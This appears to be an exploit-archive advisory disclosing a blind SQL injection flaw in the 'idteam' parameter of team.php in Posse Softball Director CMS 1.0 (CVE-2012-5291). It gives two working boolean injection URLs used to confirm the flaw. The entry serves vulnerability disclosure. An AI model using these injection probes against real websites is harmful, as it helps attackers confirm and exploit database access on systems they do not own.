Posse Softball Director CMS - 'team.php' Blind SQL Injection



EKU-ID: 24103 CVE: OSVDB-82483;CVE-2012-5291 OSVDB-ID:
Author: Easy Laster Published: 2012-01-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
 ~ Posse Softball Director CMS Blind SQL Injection Vulnerability team.php  ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-=--=-=--=-.
[+] Autor: easy laster
[+] Vulnerabilities [Blind SQL Injection ]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

    team.php?idteam=

[+] Exploitable

    http://[host]/[path]/team.php?idteam=1+and+1=1--+ #true
    http://[host]/[path]/team.php?idteam=1+and+1=2--+ #false